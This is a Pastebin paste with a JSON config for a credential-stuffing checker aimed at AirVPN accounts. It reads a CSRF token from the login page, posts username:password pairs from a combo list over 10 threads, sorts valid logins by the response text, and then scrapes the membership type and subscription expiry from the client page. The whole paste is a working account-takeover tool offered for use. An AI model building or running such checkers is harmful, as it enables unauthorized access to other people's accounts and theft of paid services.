Advertisement
Guest User

Untitled

a guest
Apr 6th, 2018
496
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.07 KB | None | 0 0
  1.  
  2. {
  3. "General": {
  4. "name": "AirVPN",
  5. "proxyType": "Proxyless",
  6. "comboType": "Email/Username:Password",
  7. "threads": 10
  8. },
  9. "Requests": [
  10. {
  11. "type": "basic",
  12. "actionUrl": "https://airvpn.org/",
  13. "method": "GET",
  14. "userAgent": "",
  15. "contentType": "",
  16. "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*",
  17. "referer": "",
  18. "successKeys": [
  19. ">Sign In</a>"
  20. ],
  21. "variables": [
  22. {
  23. "name": "auth_key",
  24. "type": "Regex",
  25. "pattern": "name='auth_key' value='([^']*)",
  26. "usedFor": "postData"
  27. }
  28. ]
  29. },
  30. {
  31. "type": "basic",
  32. "actionUrl": "https://airvpn.org/i...in&do=process",
  33. "method": "POST",
  34. "userAgent": "",
  35. "contentType": "application/x-www-form-urlencoded",
  36. "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*",
  37. "referer": "",
  38. "postData": "auth_key=+auth_key+&referer=http%3A%2F%2Fairvpn.org%2F&ips_username=<USER>&ips_password=<PASS>&rememberMe=0",
  39. "successKeys": [
  40. ">You are now signed in<"
  41. ],
  42. "failureKeys": [
  43. "Username or password incorrect"
  44. ],
  45. },
  46. {
  47. "type": "CaptureProcessing",
  48. "actionUrl": "https://airvpn.org/client/",
  49. "method": "GET",
  50. "userAgent": "",
  51. "contentType": "",
  52. "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*",
  53. "referer": "",
  54. "successKeys": [
  55. "<NOT>||you are a <b>Member</b>&&>Sign Out</a>"
  56. ],
  57. "failureKeys": [
  58. "you are a <b>Member</b>"
  59. ],
  60. "captureParse": {
  61. "patterns": [
  62. {
  63. "pattern": "you are a <b>([^</\b>]*)",
  64. "returnString": "Membership: +1+, "
  65. },
  66. {
  67. "pattern": "Your subscription will expire in <b>([^</\b>]*)",
  68. "returnString": "Expires in: +1+ days"
  69. }
  70. ]
  71. }
  72. }
  73. ]
  74. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement